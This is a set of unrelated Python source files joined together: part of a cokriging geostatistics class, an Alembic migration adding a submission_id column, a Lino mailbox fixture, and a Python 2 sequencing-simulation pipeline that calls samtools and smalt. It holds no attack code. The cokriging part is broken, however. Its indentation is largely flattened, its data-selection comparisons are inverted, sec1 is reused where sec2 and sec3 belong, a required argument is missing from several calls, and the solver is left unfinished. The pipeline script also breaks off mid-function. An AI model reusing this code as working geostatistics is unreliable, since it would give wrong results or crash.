raise ValueError("pradius_hmax should be larger than zero.")
if self.sradius_hmax <= 0:
raise ValueError("sradius_hmax should be larger than zero.")
# Check data file definition
if self.ixl < 0 and self.nx > 1:
raise ValueError("WARNING: ixl=0 and nx>1 !")
if self.iyl < 0 and self.ny > 1:
raise ValueError("WARNING: iyl=0 and ny>1 !")
if self.izl < 0 and self.nz > 1:
raise ValueError("WARNING: izl=0 and nz>1 !")
if self.ndmin <= 0:
raise ValueError("ndmin too small")
if self.ndmaxs/2 <= self.nvr and self.ktype == 2:
print('WARNING: with traditional ordinary cokriging the '+\
'sum of the weights applied to EACH secondary data'+\
'is zero. With ndmaxs set low and nvr large the'+\
'secondary data will not contribute to the estimate')
def read_data(self):
"Read a simplified Geo-EAS formatted file."
data_list = None
with open(self.datafl, 'r') as fin:
data_list = fin.readlines()
name = data_list[0].strip()
ncols = int(data_list[1].strip())
column_name = [item.strip() for item in data_list[2: ncols+2]]
self.property_name = [item for item in column_name
if item not in ['x', 'y', 'z']]
if 'z' not in column_name:
self._2d = True
column_name.append('z')
data_list = [tuple(item.strip().split() + ['0'])
for item in data_list[ncols+2:]]
else:
data_list = [tuple(item.strip().split())
for item in data_list[ncols+2:]]
data_dtype = np.dtype({
'names': column_name,
'formats': ['f8'] * len(column_name)})
self.vr = np.array(data_list, dtype=data_dtype)
def _preprocess(self):
"""create variables needed before performing kriging"""
# calculate dimensional constants
cokrige_const = namedtuple('Cokrige_const',
['PMX', 'MAXNST', 'MAXSB', 'MAXDIS',
'MAXSAM', 'UNEST', 'MAXVAR', 'MAXARG',
'MAXCOK'])
maxsbx = 1
if self.nx > 1:
maxsbx = int(self.nx/2)
if maxsbx > 50:
maxsbx = 50
maxsby = 1
if self.ny > 1:
maxsby = int(self.ny/2)
if maxsby > 50:
maxsby = 50
maxsbz = 1
if self.nz > 1:
maxsbz = int(self.nz/2)
if maxsbz > 50:
maxsbz = 50
self.const = cokrige_const(
PMX=999,
MAXNST=4,
MAXSB=(maxsbx, maxsby, maxsbz),
MAXDIS=self.nxdis * self.nydis * self.nzdis,
MAXSAM=self.ndmaxp + self.ndmaxs,
UNEST=np.nan,
MAXVAR=self.nvr,
MAXARG=self.nvr*self.nvr,
MAXCOK=(self.ndmaxp + self.ndmaxs)*self.nvr + self.nvr
)
# Calculate needed programing variables from input parameters
self.pradsqd = self.pradius_hmax * self.pradius_hmax
self.psanis1 = self.pradius_hmin / self.pradius_hmax
self.psanis2 = self.pradius_vert / self.pradius_hmax
self.sradsqd = self.sradius_hmax * self.sradius_hmax
self.ssanis1 = self.sradius_hmin / self.sradius_hmax
self.ssanis2 = self.sradius_vert / self.sradius_hmax
self.anis1 = np.array(self.aa_hmin) / \
np.maximum(self.aa_hmax, np.finfo(float).eps)
self.anis2 = np.array(self.aa_vert) / \
np.maximum(self.aa_hmax, np.finfo(float).eps)
self._fill_check_covariance()
def _set_rotation(self):
"""
Set up rotation matrix for both anisotropy and searching.
with self.rotmat being an array of 3*3 rotation matrix, the last matrix
in the array are the searching matrix
"""
ang1 = np.append(self.ang1, self.sang1)
ang2 = np.append(self.ang2, self.sang2)
ang3 = np.append(self.ang3, self.sang3)
anis1 = np.append(self.anis1, self.psanis1)
anis2 = np.append(self.anis2, self.psanis2)
anis1 = np.append(anis1, self.ssanis1)
anis2 = np.append(anis2, self.ssanis2)
self.rotmat = np.full((ang1.shape[0], 3, 3), np.nan)
def convert_ang1(ang):
if ang <= 0 and ang < 270:
alpha = np.deg2rad(90 - ang)
else:
alpha = np.deg2rad(450 - ang)
return alpha
v_convert = np.vectorize(convert_ang1)
alpha = v_convert(ang1)
beta = np.deg2rad(-ang2)
theta = np.deg2rad(ang3)
sina = np.sin(alpha)
sinb = np.sin(beta)
sint = np.sin(theta)
cosa = np.cos(alpha)
cosb = np.cos(beta)
cost = np.cos(theta)
afac1 = 1.0 / np.maximum(anis1, np.finfo(float).eps)
afac2 = 1.0 / np.maximum(anis2, np.finfo(float).eps)
self.rotmat[:, 0, 0] = cosb * cosa
self.rotmat[:, 0, 1] = cosb * sina
self.rotmat[:, 0, 2] = -sinb
self.rotmat[:, 1, 0] = afac1 * (-cost * sina + sint * sinb * cosa)
self.rotmat[:, 1, 1] = afac1 * (cost * cosa + sint * sinb * sina)
self.rotmat[:, 1, 2] = afac1 * (sint * cosb)
self.rotmat[:, 2, 0] = afac2 * (sint * sina + cost * sinb * cosa)
self.rotmat[:, 2, 1] = afac2 * (-sint * cosa + cost * sinb * sina)
self.rotmat[:, 2, 2] = afac2 * (cost * cosb)
def krige(self):
self._fill_check_covariance()
self._preprocess()
# Set up the rotation/anisotropy matrices needed for variogram
# and searching
self._set_rotation()
# compute maximum covariance for the rescaling factor:
self._max_covariance()
# Set up for super block searching:
print("Setting up Super Block Search...")
self._create_searcher()
# Set up discretization points per block
self._block_discretization()
# Find unbias value
self.unbias = self.maxcov
nxy = self.nx * self.ny
nloop = self.nx * self.ny * self.nz
print("Start working on the kriging...")
# time
t1 = time.time()
ts = 0
percent_od = 0
self.estimation = np.full((nloop,), np.nan)
self.estimation_variance = np.full((nloop,), np.nan)
# MAIN LOOP
for index in range(nloop):
self.iz = index // nxy
self.iy = (index - self.iz * nxy) // self.nx
self.ix = index - self.iz * nxy - self.iy * self.nx
xloc = self.xmn + self.ix * self.xsiz
yloc = self.ymn + self.iy * self.ysiz
zloc = self.zmn + self.iz * self.zsiz
# Search for proximity data
ts_1 = time.time()
self.searcher.search(xloc, yloc, zloc)
ts += time.time() - ts_1
# load nearest data in xa, ya, za, vra, vea
xa = list()
ya = list()
za = list()
vra = list()
iva = list() # which variable
npri = 0 # number of primary data
nsec = 0 # number of secondary data
na = 0 # number of both kinds
for i in range(self.searcher.nclose):
if npri == self.ndmaxp and nsec == self.ndmaxs:
continue
idx = self.searcher.close_samples[i]
# Load primary data
prim = self.vr[self.property_name[0]][idx]
if prim <= self.tmin and prim > self.tmax and \
npri < self.ndmaxp:
npri += 1
na += 1
xa.append(self.vr['x'][idx] - xloc)
ya.append(self.vr['y'][idx] - yloc)
za.append(self.vr['z'][idx] - zloc)
vra.append(prim)
iva.append(0)
# Load secondary data
sec1 = self.vr[self.property_name[1]][idx]
if sec1 <= self.tmin and sec1 > self.tmax and \
nsec < self.ndmaxs:
nsec += 1
na += 1
xa.append(self.vr['x'][idx] - xloc)
ya.append(self.vr['y'][idx] - yloc)
za.append(self.vr['z'][idx] - zloc)
if self.ktype != 2:
vra.append(sec1 - self.vmean[1] - self.vmean[0])
else:
vra.append(sec1)
iva.append(1)
sec2 = self.vr[self.property_name[2]][idx]
if sec2 <= self.tmin and sec2 > self.tmax and \
nsec < self.ndmaxs:
nsec += 1
na += 1
xa.append(self.vr['x'][idx] - xloc)
ya.append(self.vr['y'][idx] - yloc)
za.append(self.vr['z'][idx] - zloc)
if self.ktype != 2:
vra.append(sec1 - self.vmean[2] - self.vmean[0])
else:
vra.append(sec1)
iva.append(2)
sec3 = self.vr[self.property_name[3]][idx]
if sec3 <= self.tmin and sec3 > self.tmax and \
nsec < self.ndmaxs:
nsec += 1
na += 1
xa.append(self.vr['x'][idx] - xloc)
ya.append(self.vr['y'][idx] - yloc)
za.append(self.vr['z'][idx] - zloc)
if self.ktype != 2:
vra.append(sec1 - self.vmean[3] - self.vmean[0])
else:
vra.append(sec1)
iva.append(3)
est, estv = self._many_samples(xa, ya, za, vra, na)
self.estimation[index] = est
self.estimation_variance[index] = estv
# print working percentage
percent = np.round(index/nloop*100, decimals=0)
dtime = time.time() - t1
if percent != percent_od:
print("{}% ".format(percent) +\
"."*20 + "{}s elapsed.".format(np.round(dtime, decimals=3)))
percent_od = percent
print("Kriging Finished.")
print("Time used for searching: {}s".format(ts))
    def _many_samples(self, xa, ya, za, vra, na):
        """Solve the cokriging system for one node from the loaded samples.

        Intended to return ``(estimate, estimation_variance)``, or
        ``(nan, nan)`` when there is not enough data.

        NOTE(review): this implementation is incomplete -- after filling
        the left-hand-side matrix it falls off the end and implicitly
        returns None, while ``krige`` unpacks two values.  The right-hand
        side, the unbiasedness rows and the actual solve still need to be
        written.
        """
        # Number of equations depends on the kriging type:
        # 0 = simple, 1 = one unbiasedness constraint,
        # 2 = one constraint per variable (traditional ordinary cokriging).
        if self.ktype == 0:
            neq = na
        elif self.ktype == 1:
            neq = na + 1
        elif self.ktype == 2:
            neq = na + self.nvr
        # Reject under-determined systems or too few samples.
        if (neq - na) > na or na < self.ndmin:
            print("not enough data.")
            return np.nan, np.nan
        # left side
        left = np.full((neq, neq), np.nan)
        # fill the kriging matrix, exploiting symmetry (only compute the
        # upper triangle; mirror the rest):
        for i, j in product(range(na), range(na)):
            if np.isnan(left[j, i]):
                # NOTE(review): _cova3 is called without its ivarg
                # argument -- confirm which variogram index is intended
                # for cross-variable sample pairs.
                left[i, j] = self._cova3((xa[i], ya[i], za[i]),
                                         (xa[j], ya[j], za[j]))
            else:
                left[i, j] = left[j, i]
    @property
    def block_covariance(self):
        "return average covariance within block"
        # Computed lazily once and cached in self._block_covariance.
        if self._block_covariance is None:
            if self.ndb <= 1:  # point kriging
                self._block_covariance = self.unbias
            else:
                # Average covariance between every pair of block
                # discretization points.
                cov = list()
                for x1, y1, z1 in zip(self.xdb, self.ydb, self.zdb):
                    for x2, y2, z2 in zip(self.xdb, self.ydb, self.zdb):
                        # NOTE(review): _cova3 is called without its ivarg
                        # argument -- presumably the primary variogram.
                        cov.append(self._cova3((x1, y1, z1), (x2, y2, z2)))
                cov = np.array(cov).reshape((self.ndb, self.ndb))
                # Remove the nugget from the zero-distance (diagonal) pairs.
                # NOTE(review): self.c0 is a per-variogram *list* elsewhere
                # in this class -- confirm a scalar (e.g. c0[0]) is meant.
                cov[np.diag_indices_from(cov)] -= self.c0
                self._block_covariance = np.mean(cov)
        return self._block_covariance
def _block_discretization(self):
self.nxdis = 1 if self.nxdis < 1 else self.nxdis
self.nydis = 1 if self.nydis < 1 else self.nydis
self.nzdis = 1 if self.nzdis < 1 else self.nzdis
self.ndb = self.nxdis * self.nydis * self.nzdis
if self.ndb > self.const.MAXDIS:
raise ValueError("Too many discretization points")
xdis = self.xsiz / max(self.nxdis, 1)
ydis = self.ysiz / max(self.nydis, 1)
zdis = self.zsiz / max(self.nzdis, 1)
self.xdb = np.arange(0, self.nxdis, 1) * xdis + \
(-0.5 * self.xsiz + 0.5 * xdis)
self.ydb = np.arange(0, self.nydis, 1) * ydis + \
(-0.5 * self.ysiz + 0.5 * ydis)
self.zdb = np.arange(0, self.nzdis, 1) * zdis + \
(-0.5 * self.zsiz + 0.5 * zdis)
def _max_covariance(self):
'''
Calculate the maximum covariance value (used for zero distances and
for power model covariance):
'''
self.maxcov = self.c0
for ist in range(self.nst):
if self.it[ist] == 4:
self.maxcov += self.const.PMX
else:
self.maxcov += self.cc[ist]
def _create_searcher(self):
"Help create and initialize the searcher object"
self.searcher = SuperBlockSearcher()
# initialize required atrributes
# grid definition
self.searcher.nx = self.nx
self.searcher.xmn = self.xmn
self.searcher.xsiz = self.xsiz
self.searcher.ny = self.ny
self.searcher.ymn = self.ymn
self.searcher.ysiz = self.ysiz
self.searcher.nz = self.nz
self.searcher.zmn = self.zmn
self.searcher.zsiz = self.zsiz
# data
self.searcher.vr = self.vr
self.searcher.MAXSB = self.const.MAXSB
# rotation matrix
self.searcher.rotmat = self.rotmat[-1]
self.searcher.radsqd = self.radsqd
# octant search
self.searcher.noct = self.noct
# Setup
self.searcher.setup()
self.searcher.pickup()
# sort data according to superblock number
self.vr = self.vr[self.searcher.sort_index]
def _cova3(self, point1, point2, ivarg):
"""
Parameters
----------
point1, point2: tuple of 3
coordinates of two points
ivarg: 0, 1, 2, 3
0 for primary, 1,2,3 for secondary
Returns
-------
cova: scalar
covariance between (x1,y1,z1) and (x2,y2,z2)
"""
# Calculate the maximum covariance
istart = sum(self.nst[:ivarg])
cmax = self.c0[ivarg]
for iss in range(self.nst[ivarg]):
ist = istart + iss
if self.it[ist] == 4:
cmax += self.const.PMX
else:
cmax += self.cc[ist]
# check for 'zero' distance, return maxcov if so:
hsqd = self._sqdist(point1, point2, self.rotmat[istart])
if hsqd < np.finfo(float).eps:
cova = cmax
return cova
# loop over all structures
cova = 0
for ist in range(istart, self.nst[ivarg]):
if ist != 1:
hsqd = self._sqdist(point1, point2, self.rotmat[ist])
h = np.sqrt(hsqd)
if self.it[ist] == 1: # Spherical
hr = h / self.aa_hmax[ist]
if hr < 1:
cova += self.cc[ist] * (1 - hr * (1.5 - 0.5 * hr * hr))
elif self.it[ist] == 2: # Exponential
cova += self.cc[ist] * np.exp(-3.0 * h / self.aa_hmax[ist])
elif self.it[ist] == 3: # Gaussian
cova += self.cc[ist] * \
np.exp(-3.0 * (h / self.aa_hmax[ist]) *
(h/self.aa_hmax[ist]))
elif self.it[ist] == 4: # Power
cova += self.maxcov - self.cc[ist] * (h**(self.aa_hmax[ist]))
elif self.it[ist] == 5: # Hole Effect
cova += self.cc[ist] * np.cos(h / self.aa_hmax[ist] * np.pi)
return cova
def _sqdist(self, point1, point2, rotmat):
"""
This routine calculates the anisotropic distance between two points
given the coordinates of each point and a definition of the
anisotropy.
This method only consider a single anisotropy senario.
Parameters
----------
point1 : tuple
Coordinates of first point (x1,y1,z1)
point2 : tuple
Coordinates of second point (x2,y2,z2)
rotmat : 3*3 ndarray
matrix of rotation for this structure
Returns
-------
sqdist : scalar
The squared distance accounting for the anisotropy
and the rotation of coordinates (if any).
"""
dx = point1[0] - point2[0]
dy = point1[1] - point2[1]
dz = point1[2] - point2[2]
sqdist = 0.0
for i in range(3):
cont = rotmat[i, 0] * dx + \
rotmat[i, 1] * dy + \
rotmat[i, 2] * dz
sqdist += cont * cont
return sqdist
if __name__ == '__main__':
    # Smoke test: run the full cokriging workflow on the bundled test
    # parameter file (path is relative to the working directory).
    test_cokrige = Cokrige("testData/test_cokrige.par")
    test_cokrige.read_data()
    test_cokrige.krige()
|
"""add submission_id to PublishedAFA
Revision ID: 03257ae6000f
Revises: 4d66a8d6e11b
Create Date: 2017-10-26 09:57:31.577694
"""
# revision identifiers, used by Alembic.
revision = '03257ae6000f'
down_revision = '4d66a8d6e11b'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
    """Dispatch to the engine-specific upgrade (e.g. upgrade_data_broker)."""
    handler = globals()["upgrade_%s" % engine_name]
    handler()
def downgrade(engine_name):
    """Dispatch to the engine-specific downgrade (e.g. downgrade_data_broker)."""
    handler = globals()["downgrade_%s" % engine_name]
    handler()
def upgrade_data_broker():
    """Add a nullable submission_id column to
    published_award_financial_assistance and index it."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('published_award_financial_assistance', sa.Column('submission_id', sa.Numeric(), nullable=True))
    op.create_index(op.f('ix_published_award_financial_assistance_submission_id'), 'published_award_financial_assistance', ['submission_id'], unique=False)
    ### end Alembic commands ###
def downgrade_data_broker():
    """Reverse upgrade_data_broker: drop the index, then the column."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(op.f('ix_published_award_financial_assistance_submission_id'), table_name='published_award_financial_assistance')
    op.drop_column('published_award_financial_assistance', 'submission_id')
    ### end Alembic commands ###
|
from unipath import Path
from lino.api import dd, rt
from lino_xl.lib.mailbox.models import get_new_mail
def objects():
    """Demo fixture: install the configured mailbox templates plus a local
    ``team.mbox``, yielding a Mailbox row for each, then poll for new mail
    once all rows have been created."""
    Mailbox = rt.models.django_mailbox.Mailbox
    mailbox_dir = rt.settings.SITE.cache_dir.child("media", "mailbox")
    rt.settings.SITE.makedirs_if_missing(mailbox_dir)
    dd.logger.info("Mailbox path is %s", mailbox_dir)
    # One mailbox per configured template, copied into the cache dir.
    for protocol, tpl_name, tpl_origin in dd.plugins.mailbox.mailbox_templates:
        target = mailbox_dir.child(tpl_name)
        tpl_origin.copy(target)
        yield Mailbox(
            name=tpl_name,
            uri=protocol + "://" + target)
    # The team mbox file shipped next to this fixture module.
    name = 'team.mbox'
    target = mailbox_dir.child(name)
    Path(__file__).parent.child(name).copy(target)
    yield Mailbox(name=name, uri="mbox://" + target)
    # Runs only after the consumer exhausts the generator, i.e. after all
    # Mailbox rows exist.
    get_new_mail()
|
__author__ = 'akoziol'
# Import the necessary modules
# OS is used for file/folder manipulations
import os
# Subprocess->call is used for making system calls
import subprocess
# Errno is used in the file creation command - I think it's similar to the $! variable in Perl
import errno
# Glob finds all the path names matching a specified pattern according to the rules used by the Unix shell
import glob
# Shutil is useful for file moving/copying
import shutil
# prints variables in a form which can be used as input to the interpreter - similar to Data::Dumper?
#import pprint
# Regex
import re
# System tools
import sys
# Can import date, and calculate length of run, etc.
import time
# Multiprocessing module
from multiprocessing import Pool
# Numerical python - used in the parsing of vcf files
import numpy
# Math module - used in the parsing of vcf files
import math
# Argument parser for user-inputted values, and a nifty help menu
from argparse import ArgumentParser
#Parser for arguments
parser = ArgumentParser(description='Perform modelling of parameters for GeneSipping')
parser.add_argument('-v', '--version', action='version', version='%(prog)s v1.0')
parser.add_argument('-i', '--input', required=True, help='Specify input directory')
parser.add_argument('-l', '--readLength', required=True, help='Specify list of read lengths to be used e.g. 18, 19, 20, 21, 22')
parser.add_argument('-f', '--foldCoverage', required=True, help='Specify list of fold coverage values to be used e.g. 1, 1.5, 2, 2.5, 5')
parser.add_argument('-k', '--kmerLength', required=True, help='Specify list of kmer lengths to be used e.g. 5, 7, 11')
# Get the arguments into a list
args = vars(parser.parse_args())
# Define variables from the arguments - there may be a more streamlined way to do this
path = args['input']
# Since the following three variables need to be lists, the string entered is split on the ,
# NOTE: the entries stay strings; downstream code converts with float() as needed.
readLength = args['readLength'].split(",")
foldCoverage = args['foldCoverage'].split(",")
kmer = args['kmerLength'].split(",")
# maxRL will be used in the fold coverage calculations during simulated file generation
# NOTE(review): this takes the *last* entry, so it assumes the read lengths
# were supplied in ascending order -- confirm.
maxRL = readLength[-1]
# Initialize the required dictionaries
vcfData = {}
# Target files are in scriptPath/targets
# NOTE: these chdir calls run at import time, so the script must be started
# from the directory that contains "targets".
scriptPath = os.getcwd()
os.chdir("%s/targets" % scriptPath)
# Must have a .fa extension
targetFiles = glob.glob("*.fa")
# Add targets to appropriate list
targets = ["%s/targets/" % scriptPath + fastaFile for fastaFile in targetFiles]
# Genome reference files need to be in "path/reference"
os.chdir("%s/reference" % path)
# File extension needs to be .fa .fas .fasta, but not .ffn .fsa, etc.
referenceFile = glob.glob("*.fa*")
# Add all the reference to the references list
references = ["%s/reference/" % path + fastaFile for fastaFile in referenceFile]
# Define the path for the outputs
outPath = "%s/outputs" % path
def make_path(inPath):
    """Create *inPath* (including parents) if it does not already exist.

    EAFP variant of http://stackoverflow.com/questions/273192 -- attempt
    the creation and ignore only the 'already exists' error.
    """
    try:
        os.makedirs(inPath)
    except OSError as exc:
        # Re-raise anything other than "directory already exists".
        if exc.errno != errno.EEXIST:
            raise
def createSimulatedFilesProcesses(reference):
    """Creates a pool of processes, and maps data in a parallel fashion to createSimulatedFiles"""
    print "Creating simulated files"
    # Initialise the args list
    simulatedArgs = []
    # Every Python module has its __name__ defined and if this is '__main__',
    # it implies that the module is being run standalone by the user and we can do corresponding appropriate actions.
    # http://ibiblio.org/g2swap/byteofpython/read/module-name.html
    # NOTE(review): this guards Pool creation against re-import by worker
    # processes; the Pool is never close()d/join()ed -- confirm intended.
    if __name__ == '__main__':
        # Initialise the pool of processes - it defaults to the number of processors
        simulatedFilepool = Pool()
        # Create a tuple of the appropriate read lengths and fold coverages
        # eg. (30, 1), (30, 2), ... (30, 100), (35, 1), (35, 2), ... (150, 100)
        for rLength in readLength:
            for fCov in foldCoverage:
                simulatedArgs.append((rLength, fCov, reference))
        # Use the map function and the tuple created above to process the data rapidly
        simulatedFilepool.map(createSimulatedFiles, simulatedArgs)
def createSimulatedFiles((rLength, fCov, reference)):
"""Iterates over the readLength and foldCoverage lists to create folders (if necessary)\
and perform analyses"""
os.chdir(path)
# Create a new folder(if necessary) at the appropriate location
newPath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
newFile = "%s/%s_%s" % (newPath, rLength, fCov)
# The adjusted coverage keeps the number of reads constant for each readLength value supplied.
# a modelling experiment with a readLength of 20 will have a adjCov that is 40% the value of
# one with a readLength of 50
adjCov = float(fCov) * float(rLength)/float(maxRL)
# If using Sakai as the reference, then multiplying the foldCoverage by the constant below
# will allow for the use of precise read lengths - using a foldCoverage value of 5 will yield almost
# exactly 500 000 reads
# adjCov = float(fCov) * 0.90935049 * float(rLength)/float(maxRL)
# Call art_illumina to simulate the reads into the appropriate folders - general format of system call:
# art_illumina -i /path-to-file/Escherichia_coli_O157_H7_str_Sakai.fas -l "readLength" -f "foldCoverage" \
# -m 225 -s 60 -o /path-to-folder/Appropriate_name
artIlluminaCall = "art_illumina -i %s -l %s -f %s -o %s" % (reference, rLength, adjCov, newFile)
# If not using an adjusted coverage value, then uncomment the line below
# artIlluminaCall = "art_illumina -i %s -l %s -f %s -o %s" % (reference, rLength, float(fCov), newFile)
make_path(newPath)
if not os.path.isfile("%s.fq" % newFile):
sys.stdout.write('.')
# Subprocess.call requires that the command be finished before the loop can continue
# this ensures that processes will not be started, and continue running, while the
# script believes that it is "safe" to start more processes, eventually leading to problems
subprocess.call(artIlluminaCall, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
else:
print sys.stdout.write('.')
def faidxTargetsProcesses():
    """Faidx multiprocessing helper function"""
    print '\nProcessing targets with faidx'
    # Initialise the args list
    # NOTE: the pool maps directly over the module-level ``targets`` list.
    if __name__ == '__main__':
        # Initialise the pool of processes - it defaults to the number of processors
        faidxPool = Pool()
        faidxPool.map(faidxTargets, targets)
def faidxTargets(file):
    """Creates .fai index files of the targets, which are necessary for the conversion
    of sorted BAM files to fastq files."""
    baseName = os.path.split(file)[1]
    indexFile = "%s.fai" % file
    indexDir = "%s/targets/faidxFiles" % path
    make_path(indexDir)
    if not os.path.isfile("%s/%s.fai" % (indexDir, baseName)):
        # samtools faidx writes the .fai next to the input fasta.
        faidxCommand = "samtools faidx %s" % file
        subprocess.call(faidxCommand, shell=True,
                        stdout=open(os.devnull, 'wb'),
                        stderr=open(os.devnull, 'wb'))
        # Move the index (and a copy of the fasta) into the shared folder
        # for further processing.
        shutil.move(indexFile, indexDir)
        shutil.copy(file, indexDir)
    # Progress dot regardless of whether any work was needed.
    sys.stdout.write('.')
def indexTargets():
    """Performs smalt index on the targets using the range of k-mers stored in the variable kmer"""
    print '\nIndexing targets'
    for target in targets:
        for size in kmer:
            # Format the target names properly
            filename = os.path.split(target)[1]
            fileNoExt = filename.split(".")[0]
            # Create a new path to be created (if necessary) for the generation of the range of k-mers
            indexPath = "%s/targets/%s/%s_%s" % (path, fileNoExt, fileNoExt, size)
            # Call the make_path function to make folders as necessary
            make_path(indexPath)
            indexFileSMI = "%s.smi" % fileNoExt
            indexFileSMA = "%s.sma" % fileNoExt
            # Index the appropriate files
            # NOTE: smalt writes the .smi/.sma files into the current
            # working directory; they are moved into indexPath afterwards.
            if not os.path.isfile("%s/%s" % (indexPath, indexFileSMI)):
                indexCommand = "smalt index -k %s -s 1 %s %s/targets/faidxFiles/%s" % (size, fileNoExt, path, filename)
                subprocess.call(indexCommand, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
                shutil.move(indexFileSMI, indexPath)
                shutil.move(indexFileSMA, indexPath)
                sys.stdout.write('.')
            else:
                sys.stdout.write('.')
def mappingProcesses():
    """Mapping threads!"""
    os.chdir(path)
    print '\nPerforming reference mapping'
    mappingProcessesArgs = []
    if __name__ == '__main__':
        mappingProcessesPool = Pool()
        # Build one argument tuple per (readLength, foldCoverage, target,
        # kmer) combination; uses kmer, targets, readLength, foldCoverage
        for rLength in readLength:
            for fCov in foldCoverage:
                for target in targets:
                    for size in kmer:
                        mappingProcessesArgs.append((rLength, fCov, target, size))
        mappingProcessesPool.map(mapping, mappingProcessesArgs)
def mapping((rLength, fCov, target, size)):
    """Performs the mapping of the simulated reads to the targets"""
    filename = os.path.split(target)[1]
    fileNoExt = filename.split(".")[0]
    # Unique name encoding the full parameter combination; reused as the
    # folder and file prefix throughout the pipeline.
    megaName = "rL%s_fC%s_%s_kmer%s" % (rLength, fCov, fileNoExt, size)
    filePath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
    newPath = "%s/%s" % (filePath, megaName)
    make_path(newPath)
    targetPath = "%s/targets/%s/%s_%s" % (path, fileNoExt, fileNoExt, size)
    # Map the files to the reference (skipped when the BAM already exists)
    if not os.path.isfile("%s/%s.bam" % (newPath, megaName)):
        smaltMap = "smalt map -o %s/%s.bam -f bam -x %s/%s %s/%s_%s.fq" \
            % (newPath, megaName, targetPath, fileNoExt, filePath, rLength, fCov)
        subprocess.call(smaltMap, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
        sys.stdout.write('.')
    else:
        sys.stdout.write('.')
def sortingProcesses():
    """Multiprocessing for sorting bam files"""
    print "\nSorting bam files"
    sortingProcessesArgs = []
    if __name__ == '__main__':
        sortingProcessesPool = Pool()
        # One argument tuple per parameter combination; uses kmer, targets,
        # readLength, foldCoverage
        for rLength in readLength:
            for fCov in foldCoverage:
                for target in targets:
                    for size in kmer:
                        sortingProcessesArgs.append((rLength, fCov, target, size))
        sortingProcessesPool.map(sorting, sortingProcessesArgs)
def sorting((rLength, fCov, target, size)):
"""Performs samtools sort to return a sorted bam file"""
filename = os.path.split(target)[1]
fileNoExt = filename.split(".")[0]
megaName = "rL%s_fC%s_%s_kmer%s" % (rLength, fCov, fileNoExt, size)
sorted = megaName + "_sorted"
sortedMegaName = megaName + "_sorted.bam"
filePath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
newPath = "%s/%s" % (filePath, megaName)
#Sort the BAM file
if not os.path.isfile("%s/%s" % (newPath, sortedMegaName)):
bamSort = "samtools sort %s/%s.bam %s/%s" % (newPath, megaName, newPath, sorted)
subprocess.call(bamSort, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
sys.stdout.write('.')
else:
sys.stdout.write('.')
def bamIndexingProcesses():
    """Multiprocessing wrapper for bamIndexing."""
    print '\nIndexing bam files'
    bamIndexingArgs = []
    if __name__ == '__main__':
        bamIndexingPool = Pool()
        # One argument tuple per parameter combination; uses kmer, targets,
        # readLength, foldCoverage
        for rLength in readLength:
            for fCov in foldCoverage:
                for target in targets:
                    for size in kmer:
                        bamIndexingArgs.append((rLength, fCov, target, size))
        bamIndexingPool.map(bamIndexing, bamIndexingArgs)
def bamIndexing((rLength, fCov, target, size)):
    """Indexes the sorted bam files in order to visualize the assemblies with tablet - note this is OPTIONAL"""
    filename = os.path.split(target)[1]
    fileNoExt = filename.split(".")[0]
    megaName = "rL%s_fC%s_%s_kmer%s" % (rLength, fCov, fileNoExt, size)
    sortedMegaName = megaName + "_sorted.bam"
    filePath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
    newPath = "%s/%s" % (filePath, megaName)
    indexedName = megaName + "_sorted.bai"
    # Index only when the .bai is not already present
    if not os.path.isfile("%s/%s" % (newPath, indexedName)):
        bamIndex = "samtools index %s/%s %s/%s" % (newPath, sortedMegaName, newPath, indexedName)
        subprocess.call(bamIndex, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
        sys.stdout.write('.')
    else:
        sys.stdout.write('.')
def createVCFProcesses():
    """Multiprocessing wrapper for createVCF."""
    print '\nCreating vcf files'
    createVCFArgs = []
    if __name__ == '__main__':
        createVCFPool = Pool()
        # One argument tuple per parameter combination; uses kmer, targets,
        # readLength, foldCoverage
        for rLength in readLength:
            for fCov in foldCoverage:
                for target in targets:
                    for size in kmer:
                        createVCFArgs.append((rLength, fCov, target, size))
        createVCFPool.map(createVCF, createVCFArgs)
def createVCF((rLength, fCov, target, size)):
    """Creates the variant calling format files from which all relevant data can be pulled"""
    filename = os.path.split(target)[1]
    fileNoExt = filename.split(".")[0]
    megaName = "rL%s_fC%s_%s_kmer%s" % (rLength, fCov, fileNoExt, size)
    sortedMegaName = megaName + "_sorted.bam"
    filePath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
    vcfFile = megaName + "_sorted.vcf"
    newPath = "%s/%s" % (filePath, megaName)
    faidxTarget = "%s/targets/faidxFiles/%s" % (path, filename)
    # Read this to understand why certain flags were used
    # http://samtools.sourceforge.net/mpileup.shtml
    # NOTE: this shell pipeline targets the legacy samtools/bcftools 0.1.x
    # interface (bcftools view -cg).
    if not os.path.isfile("%s/%s" % (newPath, vcfFile)):
        vcfPipe = "samtools mpileup -A -BQ0 -d 1000000 -uf %s %s/%s | bcftools view -cg - > %s/%s" \
                  % (faidxTarget, newPath, sortedMegaName, newPath, vcfFile)
        subprocess.call(vcfPipe, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
        sys.stdout.write('.')
    else:
        sys.stdout.write('.')
def createOutputFiles():
    """Parses the vcf files created above to create a handy summary table of mapping stats"""
    print "\nCreating outputs"
    make_path(outPath)
    os.chdir(outPath)
    # NOTE: ``start`` is the module-level run timestamp; despite the .csv
    # extension the file is tab-separated.
    outFile = open("SipprModelling_%s.csv" % start, "wb")
    outFile.write("readLength\tfoldCoverage\ttarget\tkmerLength\tMedianQualityScore\t"
                  "QualityScoreSD\tMedianFoldCoverage\tFoldCoverageSD\tMedianPercentID\tqualityMetric\n")
    for rLength in readLength:
        for fCov in foldCoverage:
            for target in targets:
                for size in kmer:
                    total1 = 0
                    sys.stdout.write('.')
